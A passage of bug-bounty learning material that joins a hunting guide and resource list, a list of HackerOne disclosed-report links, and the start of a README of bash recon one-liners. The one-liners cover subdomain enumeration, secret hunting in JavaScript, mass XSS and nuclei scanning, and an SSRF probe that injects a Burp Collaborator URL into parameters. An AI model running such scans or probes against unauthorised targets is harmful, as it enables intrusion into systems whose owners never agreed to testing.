how a browser works, how they communicate and send data to the servers, DNS etc. https://developer.mozilla.org/en-US/docs/Web <b>Common scope vulnerabilities.</b> You will need to know common scope vulnerabilities such as Remote Code Execution (RCE), Cross Site Request Forgery (CSRF), Cross Site Scripting (XSS), Injections (SQL, Command etc.), Clickjacking, Open Redirects, etc. <b>Read blogs.</b> Learn new techniques from other bug bounty hunters so that you can test it out during your testing. >If you are new to Bug Bounty program, you might not feel confident that you can find something a public program. This is something that a lot of hackers are struggling with. If you haven’t found a lot of security vulnerabilities yet, it might payoff to practice on Capture The Flag (CTF). Exploiting something for the first time is difficult and eye-opening. Apply the same structure if you would apply when looking in real targets as this help you a build a solid foundation and will help you to become an amazing hacker. Use bug bounty as a way to expand your knowledge and not as a race. Write simple scripts and use available tools to expand the process of expanding attack surface [...] Understand the web application and figure out what assets the web application are trying to protect. Think like an engineer of the web application. (Jobert Abma, Hackerone Cofounder) <b>Learn how to make and then break.</b> You need to know how a web or mobile application is developed first so that you can understand how the thing works and hence how it can be broken down. This is beneficial for your long-term development rather than being a hunter that only knows how to send payloads (obtained from internet). Build a few web applications to understand how the web architecture works. > From <a href="https://twitter.com/spaceraccoonsec/status/1250403032971407360?s=20"> Spaceraccoon's tweet</a>: To be blunt, I don't automate. I tried building a pipeline and failed. You can succeed just by learning the fundamentals. Check out @PortSwigger's web academy, watch @NahamSec's stream, read @Hacker0x01 disclosures. And learn how to build what you're hacking. ### Training Platforms - [BugBountyHunter](https://www.bugbountyhunter.com/): - Simulates Opacity: The platform simulates a more realistic bug hunting experience where you need to explore and understand each features to find bugs. You do not know beforehand on whether the features have bugs or not (and what kind of vulnerabilities). - Community: Members share resources and help each other. - Zseano Methodology: Download from https://www.bugbountyhunter.com/methodology/ ## Testing Strategies <b>Scope your Testing.</b> You do not want to test the applications for different vulnerabilities in an unstructured manner because this often results in shallow testing or makes you feel that you have already search for everything. If you are stuck with your testing, ask yourself what you are testing on. Set a SMART goal - specify what the vulnerability you are targeting, the hard deadline for completing the testing, etc. This strategy will help you to know which resources to look for and specific questions to ask your peers. You can also prioritize on what to look for based on the goal. ````Example of a goal: For the next 4 hours, I will test on feature X for SQL Injection.```` <b>Choosing programs with Larger Scope.</b> You want to choose a program that uses something that you are familiar with. If not, then you must ask yourself whether this is something you will like to learn. Larger scope is better because the researchers will not concentrate on the same targets and some things might be overlooked. > From Tommy (dawgyg) DeVoss: When it comes to picking a program to start there are several things to consider. The first, and most important, is picking a program that employs the kind of stack / architecture you may be familiar with, or have a desire to learn and attack [...] Next you are going to want to consider the scope. When I look at a program to decide if I want to spend any time on it, I look for programs with either large scopes (such as wild card domains, and the more domains the better) or with web apps that are very complex. I personally love huge scopes, since it kind of helps to spread out the researchers a bit. <b>Test the uncommon attack vectors.</b> This requires you to do more in depth work in understanding how the application works (in terms of technologies and business functions). Ask yourself whether the bug that you are looking for are already tested automatically by a conventional scanner. For example, if you test a normal XSS payload on the common attack vectors such as input boxes etc., the chances are that many hunters have done it. Ask yourself whether there are other ways to trigger the XSS payload in an unexpected attack vector. > From Inti: Edge-cases like that is what I love. If I have a secret, that is the one. Do not look where everyone is looking, because you will get a duplicate [...] My advice: if you are a researcher and want to secure your payout for the next 5-10 years, start looking for custom bugs, logical flaws, and other things scanners or other researchers do not look into. That can lead to more impact, you will find new types of vulnerabilities, you can get speaker events, write blog posts about it, opportunities are plenty. It is more about your mindset and being open-minded to try stupid stuff or something unknown and not follow a checklist. <b>Look for impactful bugs.</b> Try to submit bugs which are impactful and easy to understand. Choose quality over quantity. Many successful hunters read the programme policies first before they start looking for vulnerabilities. <b>Do the unexpected action</b> Don't submit what the application is expecting. Instead, start thinking about the things that the developers did not consider. >From Peter Yaworski: <ul><li>For a text editor, if you can insert html, try doubling up on html attributes, like two hrefs in an anchor tag, or extra quotes like the markdown example.</li><li>When submitting forms, use a tool or proxy to remove parameters (for Firefox, tamperdata is a great one). On the same note, if a site is using JavaScript to validate input before it is submitted to the server, use the proxy to change the values after they are validated in the event the developer just relied on the JavaScript.</li><li>Combining steps to create vulnerability. Again, with the Hackerone markdown example, having the hanging single quote combined with additional html later in the page with a single quote would create vulnerability. With Google's program, they include a multiplier whereby if you need multiple steps and you can actually demonstrate that all the steps are achievable, they'll increase your reward.</li><li>Consider where the vulnerability might actually show up. For example, Shopify's disclosure program states that it excludes vulnerabilities on your own store or cart (I learned the hard way from over excitement...). BUT, some of the fields that are used to create your store are used externally as well. There is an disclosure report indicating that the currency formatting field allowed for XSS injection. At first glance, you would think this shows up on the store page so who cares. BUT, Shopify provides integration with Facebook and Twitter using that same field and actually rendered the XSS resulting in a $500 bounty</li></ul> ## Finding evasive bugs My notes from [Hunting Evasive Vulnerabilities: Finding Flaws That Others Miss by James Kettle](https://www.youtube.com/watch?v=skbKjO8ahCI&feature=emb_title&ab_channel=nullcon) - Don’t look for defences; Start with the attacks first. - Look for unfashionable flaws. - Your understanding of a vulnerability concept may be corrupted. Dig deeper to the original sources rather than accepting the secondary sources that appear in on internet searches to learn. - Recognise the fear from the new or unknown (Technique sounds cool but…) - Recognise that you might think that something is an implausible idea. Don’t just try something and then give out if it does not work. Instead do this: Explain why the idea will not work unless condition X exists. Try the obvious to make sure that it is obviously secured. - Look to gain advantages by having a better understanding of a particular application context, application specific knowledge or something that is inconvenient to others (such that they can't test the feature). ## Resources ### Books <ul> <li>The Web Application Hacker’s Handbook</li> <li><a href="https://www.owasp.org/index.php/OWASP_Testing_Project">OWASP Testing Guide</a></li> <li>The Tangled Web: A Guide to Securing Modern Web Applications</li> <li>Web Hacking 101</li> <li>Breaking into Information Security</li> <li>Mastering Modern Web Penetration Testing</li> <li>The Mobile Application Hacker's Handbook</li> <li><a href="https://www.owasp.org/index.php/OWASP_Mobile_Security_Testing_Guide">OWASP Mobile Security Testing Guide (MSTG)</a></li> </ul> ### Platform / Companies <ul> <li><a href="https://www.hackerone.com/">Hackerone</a></li> <li><a href="https://www.bugcrowd.com/">Bug Crowd</a></li> <li><a href="https://www.cobalt.io/">Cobalt</a></li> <li><a href="https://www.synack.com/">Synack</a></li> <li><a href="https://immunefi.com/">ImmuneFi</a></li> <li><a href="https://hackenproof.com/">HackenProof</a></li> <li><a href="https://huntr.dev/">Huntr (OSS Bounty)</a></li> <li><a href="https://www.facebook.com/whitehat">Facebook</a></li> <li><a href="https://www.google.com/about/appsecurity/">Google</a></li> </ul> ### Writeups <ul> <li><a href="https://github.com/xdavidhu/awesome-google-vrp-writeups">Google VRP Writeups</a></li> </ul> ### Online Readings <ul> <li><a href="https://portswigger.net/research/how-i-choose-a-security-research-topic">James Kettle on how he choose a security research topic</a></li> <li><a href="https://bugbountytuts.files.wordpress.com/2018/02/dirty-recon.pdf">Recon Like A Boss</a></li> <li>https://whitton.io/articles/bug-bounties-101-getting-started/</li> <li><a href="https://github.com/jhaddix/tbhm">The Bug Hunters Methodology</a></li> <li><a href="https://github.com/EdOverflow/bugbounty-cheatsheet">Bug Bounty Cheatsheet</a></li> <li><a href="https://github.com/ngalongc/bug-bounty-reference/">Bug Bounty Reference</a></li> <li><a href="https://github.com/bugcrowd/vulnerability-rating-taxonomy">Bugcrowd Vulnerability Rating Taxonomy (VRT)</a></li> <li><a href="https://hackerone.com/hacktivity">Hackerone Hacktivity</a></li> <li>https://www.hackerone.com/blog/What-To-Do-When-You-Are-Stuck-Hacking</li> <li>https://www.quora.com/How-does-one-become-a-bug-bounty-hunter/answer/Jobert-Abma</li> <li>https://www.quora.com/How-much-time-did-you-take-from-completely-beginning-hacking-to-your-first-success-or-bug-bounty/answer/Jobert-Abma</li> <li>https://www.quora.com/How-do-bug-bounty-hunters-find-bugs/answer/Jobert-Abma</li> <li>https://www.quora.com/How-much-can-I-make-in-my-first-year-as-a-bug-bounty-hunter</li> <li>https://blog.detectify.com/2019/05/03/meet-the-hacker-inti-de-ceukelaire-while-everyone-is-looking-for-xss-i-am-just-reading-the-docs</li> <li>http://blog.oath.ninja/basic-bug-bounty-faq</li> <li>https://twitter.com/spaceraccoonsec</li> <li>https://rhynorater.github.io/Beginners-Resources</li> <li>https://securityflow.io/roadmap/</li> </ul> ### Online Videos <ul> <li><a href="https://sites.google.com/site/bughunteruniversity/">Google Bughunter University</a></li> <li>https://www.hacksplaining.com/lessons</li> <li>https://www.udemy.com/android-application-penetration-testing-ethical-hacking/</li> <li>https://www.youtube.com/user/Hak5Darren/playlists</li> <li>https://www.youtube.com/user/DEFCONConference/videos</li> <li>https://www.youtube.com/user/JackkTutorials/videos</li> <li>https://www.youtube.com/watch?v=mQjTgDuLsp4</li> <li>https://www.youtube.com/watch?v=KDo68Laayh8</li> <li>https://www.youtube.com/watch?v=XoYF-euS-zs</li> <li><a href="https://www.youtube.com/watch?v=Q2WK5LpDbxw">Finding Bugs with Burp Plugins & Bug Bounty 101</a></li> </ul> ### Forums / Blogs <ul> <li>https://www.bugcrowd.com/about/blog/</li> <li>https://www.reddit.com/r/netsec</li> <li>https://www.reddit.com/r/websecurity/</li> </ul> ### Other Aggregated Resources <ul> <li>https://www.hackerone.com/blog/resources-for-new-hackers</li> <li>https://www.peerlyst.com/posts/the-everything-bug-bounty-wiki-peerlyst?trk=company_page_posts_panel</li> <li>https://github.com/onlurking/awesome-infosec</li> <li>https://forum.bugcrowd.com/t/researcher-resources-tutorials/370</li> <li>https://forum.bugcrowd.com/t/researcher-resources-tools/167</li> <li>https://forum.bugcrowd.com/t/how-do-you-approach-a-target/293</li> <li>http://www.amanhardikar.com/mindmaps/Practice.html</li> <li>https://github.com/djadmin/awesome-bug-bounty</li> </ul>
* [[kazan71p](https://hackerone.com/kazan71p)] [Information Disclosure on stun screenhero com](https://hackerone.com/reports/175061) * [[sp1d3rs](https://hackerone.com/sp1d3rs)] [Order-phishing via Payment ID URL](https://hackerone.com/reports/186862) * [[haquaman](https://hackerone.com/haquaman)] [Self-XSS via location cookie city field when getting suggestions for a new location](https://hackerone.com/reports/166709) * [[japz](https://hackerone.com/japz)] [Internal attachments can be exported via Export as zip feature](https://hackerone.com/reports/186230) * [[opnsec](https://hackerone.com/opnsec)] [XSS in IE11 on portswigger net via Flash](https://hackerone.com/reports/182160) * [[dpgribkov](https://hackerone.com/dpgribkov)] [AWS S3 bucket writable for authenticated aws user](https://hackerone.com/reports/131523) * [[clarckowen_](https://hackerone.com/clarckowen_)] [Able to Login deactivated staff account in shopify app mobile](https://hackerone.com/reports/175490) * [[arneswinnen](https://hackerone.com/arneswinnen)] [Authentication bypass on sso ubnt com via subdomain takeover of ping ubnt com](https://hackerone.com/reports/172137) * [[vibhuti_nath](https://hackerone.com/vibhuti_nath)] [IDOR Causing Deletion of any account](https://hackerone.com/reports/156537) * [[faisalahmed](https://hackerone.com/faisalahmed)] [Partial disclosure of report activity through new Export as zip feature](https://hackerone.com/reports/182358) * [[imnarendrabhati](https://hackerone.com/imnarendrabhati)] [Rate-limit bypass](https://hackerone.com/reports/165727) * [[dr_dragon](https://hackerone.com/dr_dragon)] [Application error message](https://hackerone.com/reports/147577) * [[punkrock](https://hackerone.com/punkrock)] [Window opener bug at www coinbase com](https://hackerone.com/reports/181088) * [[ahmed_ezzat_nasr0x](https://hackerone.com/ahmed_ezzat_nasr0x)] [Information leakage on https docs gdax com](https://hackerone.com/reports/168509) * [[kaleemgiet](https://hackerone.com/kaleemgiet)] [ByPassing the email Validation Email on Sign up process in mobile apps](https://hackerone.com/reports/57764) * [[strukt](https://hackerone.com/strukt)] [ kb informatica com Unauthenticated emails and HTML injection in email messages](https://hackerone.com/reports/139402) * [[mr_sharma_](https://hackerone.com/mr_sharma_)] [Reflected Cross site scripting](https://hackerone.com/reports/174909) * [[bains](https://hackerone.com/bains)] [XSS using javascript alert 8007 ](https://hackerone.com/reports/127154) * [[sameoldstory](https://hackerone.com/sameoldstory)] [Access to Amazon S3 bucket](https://hackerone.com/reports/170295) * [[robin_linus](https://hackerone.com/robin_linus)] [Public profile is vulnerable to stored XSS Facebook Token can be stolen](https://hackerone.com/reports/175122) * [[skorov](https://hackerone.com/skorov)] [AWS Signature Disclosure in www digitalsellz com allows access to S3](https://hackerone.com/reports/170052) * [[fransrosen](https://hackerone.com/fransrosen)] [Subdomain takeover on partners ubnt com due to non-used CloudFront DNS entry](https://hackerone.com/reports/145224) * [[eboda](https://hackerone.com/eboda)] [Unauthorized team members can leak information and see all API calls through 1 admin endpoints even after they have been removed ](https://hackerone.com/reports/156520) * [[eboda](https://hackerone.com/eboda)] [XSS on expenses attachments](https://hackerone.com/reports/165324) * [[shubham](https://hackerone.com/shubham)] [Stored XSS in unifi ubnt com](https://hackerone.com/reports/142084) * [[bugdiscloseguys](https://hackerone.com/bugdiscloseguys)] [Editing a project LIMITED ](https://hackerone.com/reports/176899) * [[bm666](https://hackerone.com/bm666)] [xss on demo nextcloud com due to outdated version](https://hackerone.com/reports/177713) * [[kxyry](https://hackerone.com/kxyry)] [ qiwi com Oauth ](https://hackerone.com/reports/159507) * [[marwan](https://hackerone.com/marwan)] [Bypassing You ve requested your data the maximum number of times today Please Verify an email address with snapchat to continue ](https://hackerone.com/reports/173043) * [[yaworsk](https://hackerone.com/yaworsk)] [Angular injection in the profile name of onpatient](https://hackerone.com/reports/141240) * [[yaworsk](https://hackerone.com/yaworsk)] [User with no permissions can access full wdcalendar feed](https://hackerone.com/reports/141541) * [[yaworsk](https://hackerone.com/yaworsk)] [User with no permissions can create edit delete favorite prescriptions erx ](https://hackerone.com/reports/142101) * [[mikkz](https://hackerone.com/mikkz)] [ IDOR Deleting other users comment](https://hackerone.com/reports/138243) * [[ravenbugbounty](https://hackerone.com/ravenbugbounty)] [No CAPTCHA ia exist in pages](https://hackerone.com/reports/176599) * [[fbogner](https://hackerone.com/fbogner)] [Arbitrary Code Injection in ownCloud s Windows Client](https://hackerone.com/reports/155657) * [[cyriac](https://hackerone.com/cyriac)] [Read Application Name Subscribers Count ](https://hackerone.com/reports/184057) * [[imnarendrabhati](https://hackerone.com/imnarendrabhati)] [ Stored XSS Cross Site Scripting In Slack App Name](https://hackerone.com/reports/159460) * [[nathonsecurity](https://hackerone.com/nathonsecurity)] [Unauthenticated Docker registry](https://hackerone.com/reports/179103) * [[dejavuln](https://hackerone.com/dejavuln)] [OX Guard Stored Cross-Site Scripting via Email Attachment](https://hackerone.com/reports/165275) * [[cyriac](https://hackerone.com/cyriac)] [Bypass the resend limit in Send Invites](https://hackerone.com/reports/182530) * [[madrobot](https://hackerone.com/madrobot)] [ Spam Some one using user saveInvite system](https://hackerone.com/reports/182089) * [[brainspere402](https://hackerone.com/brainspere402)] [Missing Rate limiting for sensitive actions like forgot password and reCaptcha error ](https://hackerone.com/reports/159497) * [[jamesclyde](https://hackerone.com/jamesclyde)] [ BYPASS Open redirect and XSS in supporthiring shopify com](https://hackerone.com/reports/158434) * [[sasi2103](https://hackerone.com/sasi2103)] [Researcher gets email updates on a private program after he she quits that program ](https://hackerone.com/reports/174449) * [[linkks](https://hackerone.com/linkks)] [RC4 cipher suites detected on status slack com](https://hackerone.com/reports/99157) * [[sameoldstory](https://hackerone.com/sameoldstory)] [Full access to any list](https://hackerone.com/reports/173969) * [[linkks](https://hackerone.com/linkks)] [ ](https://hackerone.com/reports/117902) * [[japz](https://hackerone.com/japz)] [Nginx version disclosure via response header](https://hackerone.com/reports/183245) * [[asanso](https://hackerone.com/asanso)] [CSRF in github integration](https://hackerone.com/reports/174328) * [[rpinuaga](https://hackerone.com/rpinuaga)] [Reflected XSS in www lahitapiola fi cs Satellite using Oracle WebCenter -page](https://hackerone.com/reports/164578) * [[rpinuaga](https://hackerone.com/rpinuaga)] [Oracle WebCenter Sites Support Tools available and Information disclosure cs Satellite ](https://hackerone.com/reports/164581) * [[gaurang](https://hackerone.com/gaurang)] [Subdomain Takeover on http kiosk owox com ](https://hackerone.com/reports/182576) * [[hussain_0x3c](https://hackerone.com/hussain_0x3c)] [Cross-Site Scripting Stored On Rich Media](https://hackerone.com/reports/142540) * [[ameerpornillos](https://hackerone.com/ameerpornillos)] [Administrator Access To Management Console](https://hackerone.com/reports/182637) * [[guido](https://hackerone.com/guido)] [Arbitrary heap overread in strscan on 32 bit Ruby patch included](https://hackerone.com/reports/166661) * [[sameoldstory](https://hackerone.com/sameoldstory)] [Seemingly sensitive information at api v2 zones](https://hackerone.com/reports/165131) * [[sameoldstory](https://hackerone.com/sameoldstory)] [DOM based XSS in search functionality](https://hackerone.com/reports/168165) * [[kaleemgiet](https://hackerone.com/kaleemgiet)] [Runtime manipulation iOS app breaking the PIN](https://hackerone.com/reports/80512) * [[cablej](https://hackerone.com/cablej)] [Information disclosure of user by email using buy widget](https://hackerone.com/reports/176002) * [[ameerpornillos](https://hackerone.com/ameerpornillos)] [Password Forgot Password Reset Request Bug](https://hackerone.com/reports/182267) * [[1_1_1](https://hackerone.com/1_1_1)] [Information disclosure of website](https://hackerone.com/reports/179121) * [[karel_origin](https://hackerone.com/karel_origin)] [Access to local file system using javascript](https://hackerone.com/reports/175979) * [[mr_sharma_](https://hackerone.com/mr_sharma_)] [Email Spoofing](https://hackerone.com/reports/163526) * [[lalka](https://hackerone.com/lalka)] [Time-based sql-injection https puzzle mail ru](https://hackerone.com/reports/170149) * [[abc12345](https://hackerone.com/abc12345)] [Unsecured Grafana instance](https://hackerone.com/reports/182234) * [[kedrisch](https://hackerone.com/kedrisch)] [View liked twits of private account via publish twitter com](https://hackerone.com/reports/174721) * [[faisalahmed](https://hackerone.com/faisalahmed)] [Stored XSS in Filters](https://hackerone.com/reports/141114) * [[hackerwahab](https://hackerone.com/hackerwahab)] [Stored Xss in rpm newrelic com](https://hackerone.com/reports/170241) * [[japz](https://hackerone.com/japz)] [Nginx server version disclosure](https://hackerone.com/reports/182046) * [[japz](https://hackerone.com/japz)] [htaccess file is accesible](https://hackerone.com/reports/182017) * [[japz](https://hackerone.com/japz)] [Spoof Email with Hyperlink Injection via Invites functionality](https://hackerone.com/reports/182008) * [[bibo](https://hackerone.com/bibo)] [2 Directory Listing on ledger brave com vault-staging brave com](https://hackerone.com/reports/175320) * [[ak1t4](https://hackerone.com/ak1t4)] [Email Server Compromised at secure lahitapiola fi](https://hackerone.com/reports/177225) * [[e3amn2l](https://hackerone.com/e3amn2l)] [Not using Binary safe functions for substr strlen function](https://hackerone.com/reports/181315) * [[mikkz](https://hackerone.com/mikkz)] [ IDOR post to anyone even if their stream is restricted to friends only](https://hackerone.com/reports/137954) * [[flashdisk](https://hackerone.com/flashdisk)] [race condition in adding team members](https://hackerone.com/reports/176127) * [[c0rte](https://hackerone.com/c0rte)] [No rate-limit in SERVER SECURITY CHECK](https://hackerone.com/reports/174668) * [[ng1](https://hackerone.com/ng1)] [Content Spoofing or Text Injection 404 error page injection on yrityspalvelu ](https://hackerone.com/reports/134388) * [[tsug0d](https://hackerone.com/tsug0d)] [Reflected XSS in LTContactFormReceiver cs Satellite ](https://hackerone.com/reports/172595) * [[mr_sharma_](https://hackerone.com/mr_sharma_)] [No password length restriction](https://hackerone.com/reports/167351) * [[e3amn2l](https://hackerone.com/e3amn2l)] [Using plain git protocol vulnerable to MITM ](https://hackerone.com/reports/181214) * [[e3amn2l](https://hackerone.com/e3amn2l)] [Missing GIT tag commit verification in Docker](https://hackerone.com/reports/181212) * [[artem](https://hackerone.com/artem)] [ community informatica com - CSRF in Private Messages allows to move user s messages to Trash](https://hackerone.com/reports/45050) * [[konqi](https://hackerone.com/konqi)] [ informatica com Blind SQL Injection](https://hackerone.com/reports/117073) * [[alyssa_herrera](https://hackerone.com/alyssa_herrera)] [ now informatica com Reflective Xss](https://hackerone.com/reports/81191) * [[yarbabin](https://hackerone.com/yarbabin)] [ rev-app informatica com - XXE](https://hackerone.com/reports/105434) * [[sahiltikoo](https://hackerone.com/sahiltikoo)] [Denial of service POP UP Recursion on Brave browser](https://hackerone.com/reports/179248) * [[vijay_kumar1110](https://hackerone.com/vijay_kumar1110)] [ idor Unauthorized Read access to all the private posts Including Photos Videos Gifs ](https://hackerone.com/reports/148764) * [[hogarth45](https://hackerone.com/hogarth45)] [Emails and alert policies can be altered by malicious users ](https://hackerone.com/reports/123120) * [[pavanw3b](https://hackerone.com/pavanw3b)] [Host Header Injection Cache Poisoning](https://hackerone.com/reports/123513) * [[cjlegacion](https://hackerone.com/cjlegacion)] [Cookie Misconfiguration](https://hackerone.com/reports/163227) * [[punkrock](https://hackerone.com/punkrock)] [Possilbe Sub Domain takever at prestashop algolia com](https://hackerone.com/reports/173417) * [[lmx](https://hackerone.com/lmx)] [More content spoofing through dir param in the files app](https://hackerone.com/reports/154827) * [[0xsyndr0me](https://hackerone.com/0xsyndr0me)] [Link sanitation bypass in xss clean ](https://hackerone.com/reports/171670) * [[kholy](https://hackerone.com/kholy)] [BAD Code ](https://hackerone.com/reports/180074) * [[michiel](https://hackerone.com/michiel)] [Authorization Bypass in Delivery Chat Logs](https://hackerone.com/reports/144000) * [[jobert](https://hackerone.com/jobert)] [Ability to access all user authentication tokens leads to RCE](https://hackerone.com/reports/158330) * [[lewerkun](https://hackerone.com/lewerkun)] [Information disclosure at https blockchain atlassian net](https://hackerone.com/reports/179599) * [[seifelsallamy](https://hackerone.com/seifelsallamy)] [Open redirection ](https://hackerone.com/reports/132251) * [[cmd-0_0](https://hackerone.com/cmd-0_0)] [ website Script injection in newsletter signup https brave com brave youth program signup html](https://hackerone.com/reports/175403) * [[hackerone_hero](https://hackerone.com/hackerone_hero)] [DMARC Not found for paragonie com URGENT](https://hackerone.com/reports/179828) * [[sstok](https://hackerone.com/sstok)] [Not clearing hex-decoded variable after usage in Authentication](https://hackerone.com/reports/168293) * [[jobert](https://hackerone.com/jobert)] [Read files on application server leads to RCE](https://hackerone.com/reports/178152) * [[yashmaurya](https://hackerone.com/yashmaurya)] [Reflected XSS in OLX in](https://hackerone.com/reports/175801) * [[zephrfish](https://hackerone.com/zephrfish)] [ oneclickdrsfdc-test informatica com Tomcat Example Scripts Exposed Unauthenticated](https://hackerone.com/reports/147161) * [[ayid](https://hackerone.com/ayid)] [ Thirdparty Stored XSS in chat module - nextcloud server 9 0 51 installed in ubuntu 14 0 4 LTS](https://hackerone.com/reports/148897) * [[bobrov](https://hackerone.com/bobrov)] [ api owncloud org CRLF Injection](https://hackerone.com/reports/154306) * [[bobrov](https://hackerone.com/bobrov)] [ doc owncloud org CRLF Injection](https://hackerone.com/reports/154275) * [[bobrov](https://hackerone.com/bobrov)] [ monitor sjc dropbox com CRLF Injection](https://hackerone.com/reports/39261) * [[bobrov](https://hackerone.com/bobrov)] [ greenhouse io CRLF Injection Insecure nginx configuration](https://hackerone.com/reports/25275) * [[murthy68](https://hackerone.com/murthy68)] [Mail ru for Android Content Provider Vulnerability](https://hackerone.com/reports/143280) * [[vagg-a-bond](https://hackerone.com/vagg-a-bond)] [Project Disclosure of all Harvest Instances](https://hackerone.com/reports/152929)
## 👑 What is KingOfOneLineTips Project ? 👑 Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters.. Want to earn 100 dollars using my code on ocean-digital? https://m.do.co/c/703ff752fd6f ## Join Us [![Telegram](https://patrolavia.github.io/telegram-badge/chat.png)](https://t.me/joinchat/DN_iQksIuhyPKJL1gw0ttA) [![The King](https://aleen42.github.io/badges/src/twitter.svg)](https://twitter.com/ofjaaah) ## Special thanks - [@Stokfredrik](https://twitter.com/stokfredrik) - [@Jhaddix](https://twitter.com/Jhaddix) - [@pdiscoveryio](https://twitter.com/pdiscoveryio) - [@TomNomNom](https://twitter.com/TomNomNom) - [@jeff_foley](https://twitter.com/@jeff_foley) - [@NahamSec](https://twitter.com/NahamSec) - [@j3ssiejjj](https://twitter.com/j3ssiejjj) - [@zseano](https://twitter.com/zseano) - [@pry0cc](https://twitter.com/pry0cc) ## Scripts that need to be installed To run the project, you will need to install the following programs: - [Anew](https://github.com/tomnomnom/anew) - [Qsreplace](https://github.com/tomnomnom/qsreplace) - [Subfinder](https://github.com/projectdiscovery/subfinder) - [Gospider](https://github.com/jaeles-project/gospider) - [Github-Search](https://github.com/gwen001/github-search) - [Amass](https://github.com/OWASP/Amass) - [Hakrawler](https://github.com/hakluke/hakrawler) - [Gargs](https://github.com/brentp/gargs) - [Chaos](https://github.com/projectdiscovery/chaos-client) - [Httpx](https://github.com/projectdiscovery/httpx) - [Jaeles](https://github.com/jaeles-project/jaeles) - [Findomain](https://github.com/Edu4rdSHL/findomain) - [Gf](https://github.com/tomnomnom/gf) - [Unew](https://github.com/dwisiswant0/unew) - [Rush](https://github.com/shenwei356/rush) - [Jsubfinder](https://github.com/hiddengearz/jsubfinder) - [Shuffledns](https://github.com/projectdiscovery/shuffledns) - [haktldextract](https://github.com/hakluke/haktldextract) - [Gau](https://github.com/lc/gau) - [Axiom](https://github.com/pry0cc/axiom) - [Html-tools](https://github.com/tomnomnom/hacks/tree/master/html-tool) - [Dalfox](https://github.com/hahwul/dalfox) - [Gowitness](https://github.com/sensepost/gowitness) - [Kxss](https://github.com/Emoe/kxss) ### OneLiners ### SonarDNS extract subdomains - [Explaining command](https://bit.ly/2NvXRyv) ```bash wget https://opendata.rapid7.com/sonar.fdns_v2/2021-01-30-1611965078-fdns_a.json.gz ; gunzip 2021-01-30-1611965078-fdns_a.json ; cat 2021-01-30-1611965078-fdns_a.json | grep ".DOMAIN.com" | jq .name | tr '" " "' " / " | tee -a sonar ``` ### Kxss to search param XSS - [Explaining command](https://bit.ly/3aaEDHL) ```bash echo http://testphp.vulnweb.com/ | waybackurls | kxss ``` ### Recon subdomains and gau to search vuls DalFox - [Explaining command](https://bit.ly/3aMXQOF) ```bash assetfinder testphp.vulnweb.com | gau | dalfox pipe ``` ### Recon subdomains and Screenshot to URL using gowitness - [Explaining command](https://bit.ly/3aKSSCb) ```bash assetfinder -subs-only army.mil | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @' ``` ### Extract urls to source code comments - [Explaining command](https://bit.ly/2MKkOxm) ```bash cat urls1 | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]' ``` ### Axiom recon "complete" - [Explaining command](https://bit.ly/2NIavul) ```bash findomain -t domain -q -u url ; axiom-scan url -m subfinder -o subs --threads 3 ; axiom-scan subs -m httpx -o http ; axiom-scan http -m ffuf --threads 15 -o ffuf-output ; cat ffuf-output | tr "," " " | awk '{print $2}' | fff | grep 200 | sort -u ``` ### Domain subdomain extraction - [Explaining command](https://bit.ly/3c2t6eG) ```bash cat url | haktldextract -s -t 16 | tee subs.txt ; xargs -a subs.txt -I@ sh -c 'assetfinder -subs-only @ | anew | httpx -silent -threads 100 | anew httpDomain' ``` ### Search .js using - [Explaining command](https://bit.ly/362LyQF) ```bash assetfinder -subs-only DOMAIN -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | awk '{print $3}' | grep -E "\.js(?:onp?)?$" | anew ``` ### This one was huge ... But it collects .js gau + wayback + gospider and makes an analysis of the js. tools you need below. - [Explaining command](https://bit.ly/3sD0pLv) ```bash cat dominios | gau |grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> gauJS.txt ; cat dominios | waybackurls | grep -iE '\.js'|grep -iEv '(\.jsp|\.json)' >> waybJS.txt ; gospider -a -S dominios -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" >> gospiderJS.txt ; cat gauJS.txt waybJS.txt gospiderJS.txt | sort -u >> saidaJS ; rm -rf *.txt ; cat saidaJS | anti-burl |awk '{print $4}' | sort -u >> AliveJs.txt ; xargs -a AliveJs.txt -n 2 -I@ bash -c "echo -e '\n[URL]: @\n'; python3 linkfinder.py -i @ -o cli" ; cat AliveJs.txt | python3 collector.py output ; rush -i output/urls.txt 'python3 SecretFinder.py -i {} -o cli | sort -u >> output/resultJSPASS' ``` ### My recon automation simple. OFJAAAH.sh - [Explaining command](https://bit.ly/3nWHM22) ```bash amass enum -d $1 -o amass1 ; chaos -d $1 -o chaos1 -silent ; assetfinder $1 >> assetfinder1 ; subfinder -d $1 -o subfinder1 ; findomain -t $1 -q -u findomain1 ;python3 /root/PENTESTER/github-search/github-subdomains.py -t YOURTOKEN -d $1 >> github ; cat assetfinder1 subfinder1 chaos1 amass1 findomain1 subfinder1 github >> hosts ; subfinder -dL hosts -o full -timeout 10 -silent ; httpx -l hosts -silent -threads 9000 -timeout 30 | anew domains ; rm -rf amass1 chaos1 assetfinder1 subfinder1 findomain1 github ``` ### Download all domains to bounty chaos - [Explaining command](https://bit.ly/38wPQ4o) ```bash wget https://raw.githubusercontent.com/KingOfBugbounty/KingOfBugBountyTips/master/downlink ; xargs -a downlink -I@ sh -c 'wget @ -q'; mkdir bounty ; unzip '*.zip' -d bounty/ ; rm -rf *zip ; cat bounty/*.txt >> allbounty ; sort -u allbounty >> domainsBOUNTY ; rm -rf allbounty bounty/ ; echo '@OFJAAAH' ``` ### Recon to search SSRF Test - [Explaining command](https://bit.ly/3shFFJ5) ```bash findomain -t DOMAIN -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace http://YOUR.burpcollaborator.net ``` ### ShuffleDNS to domains in file scan nuclei. - [Explaining command](https://bit.ly/2L3YVsc) ```bash xargs -a domain -I@ -P500 sh -c 'shuffledns -d "@" -silent -w words.txt -r resolvers.txt' | httpx -silent -threads 1000 | nuclei -t /root/nuclei-templates/ -o re1 ``` ### Search Asn Amass - [Explaining command](https://bit.ly/2EMooDB) Amass intel will search the organization "paypal" from a database of ASNs at a faster-than-default rate. It will 